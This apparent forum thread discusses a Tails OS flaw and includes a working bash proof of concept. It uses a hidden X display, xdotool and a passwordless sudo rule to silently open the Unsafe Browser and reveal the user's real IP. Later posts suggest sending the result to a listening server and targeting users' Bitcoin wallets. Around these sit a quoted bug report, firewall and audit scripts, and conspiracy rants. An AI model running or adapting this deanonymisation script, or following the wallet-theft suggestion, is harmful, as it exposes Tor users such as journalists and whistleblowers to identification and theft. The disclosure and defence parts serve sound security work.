Tails Amnesia Public IP Leak

Because of a sudoers.d rule that allows running sudo unsafe-browser with NOPASSWD, this example script can run in the background and leak your public IP with no interaction or indication that it's happening. No privilege escalation needed.

#!/bin/bash
# Start a headless X server on a spare display so nothing shows on the real one.
export DISPLAY=:69
# Move the user's session D-Bus socket aside while the browser starts (restored below).
mv /run/user/1000/bus{,.bak}
Xvfb $DISPLAY -r -nocursor &
xpid=$!
sleep 1
# The NOPASSWD sudoers rule lets this start as root with no password prompt.
sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &
# Wait for the zenity confirmation dialog and click through it.
xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return
# Wait for the browser window, then load a page that echoes the client's public IP.
xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return
# The page puts the IP in its title, so read it from the window name.
xdotool search --sync --name Your getwindowname | awk '{print $5}'
mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0

Tails is just Debian with iptables and an upgrade program included

that's literally every linux distro ever

how's that going to happen exactly?
just have it connect to a server set up to listen for such requests.
what is that server going to do with this information? If it can't be correlated with anything, it's just "someone ran Tails on this IP"

this is why Whonix style is superior
always have a workstation VM and a gateway VM
ensure the workstation only connects to the internet via Tor ports, NAT is disabled, everything firewalled off, etc.
no matter how much you fuck up on the workstation it will be nearly impossible to connect to anything outside of the Tor ports on the gateway, short of an exploit allowing you to jump out of a VM, but then you're fucked anyway.
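What the workstation half of that split looks like as a firewall policy, as an added example that is not from the thread or from the Whonix project. The gateway address 10.152.152.10 and the Tor SocksPort/TransPort/DNSPort numbers 9050, 9040 and 5300 are assumptions to match against your own gateway's torrc; with DRY_RUN=1 the script prints the rules instead of applying them, so it can be reviewed without root.

```shell
#!/bin/bash
# Added example for this thread (not Whonix code): egress policy for a Tor
# workstation VM that may only talk to the gateway VM's Tor ports.
# Assumptions: the gateway is reachable at 10.152.152.10 on the internal
# network and Tor listens there on SocksPort 9050, TransPort 9040, DNSPort 5300.
GATEWAY="${GATEWAY:-10.152.152.10}"
TOR_TCP_PORTS="${TOR_TCP_PORTS:-9050 9040}"
TOR_DNS_PORT="${TOR_DNS_PORT:-5300}"

# Execute a command, or only print it when DRY_RUN=1 so the rule set can be
# reviewed before it is applied as root.
run() {
    if [ "${DRY_RUN:-0}" = 1 ]; then echo "$*"; else "$@"; fi
}

workstation_rules() {
    local p
    # Start clean; the workstation does no NAT or forwarding of its own.
    run iptables -F
    run iptables -t nat -F
    # Default deny in every direction: anything not whitelisted below is dropped,
    # even if a compromised program opens a raw socket or tries a new protocol.
    run iptables -P INPUT DROP
    run iptables -P FORWARD DROP
    run iptables -P OUTPUT DROP
    # Loopback only talks to ourselves.
    run iptables -A INPUT -i lo -j ACCEPT
    run iptables -A OUTPUT -o lo -j ACCEPT
    # Replies to connections the workstation opened towards the gateway.
    run iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # The only permitted destinations: Tor's listeners on the gateway.
    for p in $TOR_TCP_PORTS; do
        run iptables -A OUTPUT -d "$GATEWAY" -p tcp --dport "$p" -j ACCEPT
    done
    run iptables -A OUTPUT -d "$GATEWAY" -p udp --dport "$TOR_DNS_PORT" -j ACCEPT
    # Log what gets dropped so a leaking program shows up in the journal.
    run iptables -A OUTPUT -j LOG --log-prefix "ws-egress-drop: "
    # Tor is reached over IPv4 only; block IPv6 outright rather than leak through it.
    run ip6tables -P INPUT DROP
    run ip6tables -P FORWARD DROP
    run ip6tables -P OUTPUT DROP
}

# Review helper: number of OUTPUT ACCEPT rules in the generated set. Anything
# beyond loopback plus the gateway ports above is a mistake.
count_output_accepts() {
    DRY_RUN=1 workstation_rules | grep -c -- '-A OUTPUT .* -j ACCEPT'
}

# Review helper: every non-loopback destination the set accepts; must be only
# the gateway address.
accepted_destinations() {
    DRY_RUN=1 workstation_rules | grep -- '-A OUTPUT -d' | awk '{print $5}' | sort -u
}

if [ "${1:-}" = apply ]; then
    workstation_rules
fi
```

Run it as DRY_RUN=1 ./ws-fw.sh apply first and check the two review helpers, then as root without DRY_RUN and persist the result with iptables-save. The LOG rule is what tells you when something on the workstation tries to reach the clearnet directly, which is exactly the failure the Tails PoC in the OP exploits on a single-host system.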

That's just an example, you can do worse things, you just need to compromise the amnesia account first, which I consider gameover anyway.

It uses X fuckery to run hidden GUI programs and xdotool to simulate mouse and keyboard presses. The script just navigates to www.yourip.us in the Unsafe Browser and reads the window name, all while it's hidden from view.

Is the point of this thread that executing untrusted scripts in Tails can be dangerous?

heads.dyne.org/

...

Isn't that supposed to be an operating system for security/privacy? Where's the statically compiled musl? Where's the GRSEC and RBAC? Is this a joke?

i become curl | bash destroyer of noobs

UNIX has more holes than Swiss cheese.

Subject: Re: UNIX (In)Security
> From: AB
>
> I'm trying to convince my favorite TLA official that
> putting data on a UNIX machine on the TLA network is about
> as secure as posting it to alt.flame. Does anyone have a
> document on UNIX (in)security I could pass on?

alt.flame would be inappropriate if the material in question
isn't a flame or a response to one. I suggest tla.bboard if
the data is about things of general interest (like how much
certain people make).

Or, you could just put it up for anonymous ftp with the X
sources (eww!) on export.eve.rcl.ear. Then post a "ThE
sEkrIt Tla dATa yoU hAve BeEn waItInG foR is ON
eXpoRt.eve.rcl.ear" message to misc.wanted.

Seriously, look at the Kerberos papers. Look at the Orange
Book (trusted systems evaluation manual from the NCSC).
Realize that Unix security is like swiss cheese - not a
Jarlsberg or other cheese with a few big holes in it, but an
Alpine Lace cheese with thousands of tiny holes in it which
you could never plug all of. You can wrap it in saran wrap,
but you've still done nothing for the underlying structure,
save for reducing the rate at which mold grows on it.

the point is that Tails claims the amnesia user can't leak your real IP without escalating to another user (priv escalation exploit). The OP shows it can.

sudo rm /etc/sudoers.d/zzz_unsafe-browser

issue fixed

This.
Allowing access to the regular internet is just an accident waiting to happen.

There has been a ticket for this for almost a year but it's been ignored.
redmine.tails.boum.org/code/issues/15635

The X11 protocol has long been known to not provide isolation between windows. Here I will show that it can be abused to bypass the firewall without any user interaction or visible side-effects by abusing the Unsafe Browser. I also provide mitigations while waiting for the switch to Wayland.

The existence of the clearnet user and the sudoers whitelist [1] for the Unsafe Browser makes it possible to reliably bypass the firewall by abusing the X11 protocol. Previously, I've seen doubts that this can be done surreptitiously and claims that it would necessarily require that the users see the browser pop up and the mouse be moved without their control. I have written a simple PoC (proof of concept) exploit which bypasses the firewall to show that is untrue:

The Unsafe Browser, or more specifically the clearnet user, should not be enabled and functional by default. Whenever it is not needed, the clearnet user should be locked, and the Unsafe Browser should either throw an error on access or not even be displayed. I can think of three mitigations:

Disable the browser by default, requiring it to be explicitly enabled in the splash screen.
Disable the browser as soon as Tor successfully connects, which would indicate no captive portal.
Attempt captive portal detection [2] to detect request rewrites and enable the Unsafe Browser only then.

I am marking this as a bug because this PoC clearly shows that the Unsafe Browser violates the security principles in the specified design documents [3]. Until the switch to Wayland is completed (and perhaps even then), the existence of the clearnet user should be considered incompatible with anonymous Tor usage. I am currently working on another exploit which bypasses the browser AppArmor profile without user interaction in order for this to be possible from within the context of a compromised browser as well. If I have the time, I will finish it up and report it as well.

[1]: git-tails.immerda.ch/tails/plain/config/chroot_local-includes/etc/sudoers.d/zzz_unsafe-browser
[2]: chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection
[3]: tails.boum.org/contribute/design/Unsafe_Browser/
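The sudoers rule the OP abuses, the rm mitigation posted above and the ticket's suggestion to lock the clearnet user can be checked and applied from one script. The following is an added example, not code from the thread or from Tails. It assumes the Tails layout discussed here (the rule in /etc/sudoers.d/zzz_unsafe-browser, a user named clearnet) plus the standard X socket directory /tmp/.X11-unix, where the PoC's Xvfb on :69 leaves a socket X69 next to the real display's X0; the sample sudoers line in the comment is constructed.

```shell
#!/bin/bash
# Added example for this thread (not Tails code). Checks for the two things
# the OP's PoC relies on and applies the mitigations discussed in the thread.
# Assumed Tails layout: NOPASSWD rule in /etc/sudoers.d/zzz_unsafe-browser,
# one /tmp/.X11-unix/X<n> socket per running X server, clearnet user "clearnet".
SUDOERS_RULE="${SUDOERS_RULE:-/etc/sudoers.d/zzz_unsafe-browser}"
X_SOCK_DIR="${X_SOCK_DIR:-/tmp/.X11-unix}"

# Print the lines in file $1 that let unsafe-browser run under sudo without a
# password, e.g. the constructed sample
#   amnesia ALL = (root) NOPASSWD: /usr/local/sbin/unsafe-browser
# Returns 0 if such a rule exists, 1 if the file is missing or has none.
find_unsafe_browser_rule() {
    local file="$1"
    [ -r "$file" ] || return 1
    grep -E 'NOPASSWD:.*unsafe-browser' "$file"
}

# Print X display numbers other than the real display ($2, default 0) that
# have an entry in $1. The PoC's Xvfb on :69 shows up here as "69"; on an
# untouched session the output is empty.
hidden_x_displays() {
    local sockdir="$1" real="${2:-0}" s n
    for s in "$sockdir"/X*; do
        [ -e "$s" ] || continue          # glob matched nothing
        n="${s##*/X}"
        [ "$n" = "$real" ] && continue
        echo "$n"
    done
}

# Report what the PoC needs. Exit status 0 means neither condition is present.
# Optional args: sudoers file, X socket dir (default to the paths above).
audit() {
    local rule="${1:-$SUDOERS_RULE}" sockdir="${2:-$X_SOCK_DIR}" status=0 extra
    if find_unsafe_browser_rule "$rule"; then
        echo "passwordless sudo for unsafe-browser is enabled (rule above)" >&2
        status=1
    fi
    extra=$(hidden_x_displays "$sockdir")
    if [ -n "$extra" ]; then
        echo "unexpected X displays: $extra (a hidden Xvfb like the PoC's :69?)" >&2
        pgrep -a 'Xvfb|xdotool' >&2 || true
        status=1
    fi
    return "$status"
}

# Mitigation (needs root): drop the rule so sudo prompts again, and lock the
# clearnet user so the Unsafe Browser cannot switch to it. Undo by restoring
# the file and running `usermod -U clearnet` when a captive portal must be passed.
mitigate() {
    rm -f "$SUDOERS_RULE"
    usermod -L clearnet
}

case "${1:-}" in
    audit)    shift; audit "$@" ;;
    mitigate) mitigate ;;
esac
```

audit needs no privileges and exits nonzero if either condition is present; mitigate needs root. A second runtime check that does not depend on file paths is sudo -n -l, which lists the commands sudo will run for the current user without a password and should not mention unsafe-browser after mitigation.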

I wouldn't trust heads, an early version had the control port open for Tor without a filter/whitelist and a simple GETINFO address to the Tor control port would reveal your true IP. It's since been fixed but that's an amateur mistake.

Who cares about their IP? If you can get RCE on a tails user, go for the electrum/bitcoin wallet. 90% of people who use tails are drug dealers/buyers.

Before reddit.com/r/darknetmarketsnoobs was banned, it had thousands of viewers a day and the posts were mostly normies having issues running Tails.

Also, a simple priv escalation bug was just fixed in the latest version of heads, 0.4. Updates weren't even GPG signed. Use heads with caution.

How does Tails get millions of dollars in donations? I literally made something that works exactly like Tails with Debian live-build in 3 days with a few hours of work a day. It didn't have the auto update infrastructure but still. It was the same way that Tails builds images, through Debian live-build scripts with a package list and preconfigured configs.

How much are you paying your shills? How many news sites have you had publish a shill piece on it?
At least you can reap some benefits from security by obscurity.

>trusting Tails Amnesia just because Ed "the Clown In America who used his NSA clearance to fuck with the NSA ops as former CIA double-acting baking soda agent" told them he uses it and he's famous like there's 3 movies about him and big posters looking like he's 2013 Che Guevara.
"Let's shill a justwerks (((anonymous))) system pack for pesky journalists, traitorous insiders, and whistleblowers that are against or a threat to our agendas. Now that they watched those movies of their rockstar super hero Snowden or even most of his speeches they'll fall to memetics and quickly use and trust our tools like a tool (not a pun) and so that then we can kill these very threatening pesky pests so we can finally see the light in our grand agendas."
"say no more" -Ed


Slush fund from the big 3


Notice how this NSA shill spreads FUD without backing up his claims or even offering secure alternatives to what he perceives as a honeypot. Begone officer.

Windows has more holes than the average claim on Zig Forums but life goes on. Also linux is not unix.

based

Are you a Microsoft shill, else why are you bringing up Windows?
Correct, but it and the user spaces that are commonly paired with it are UNIX-like.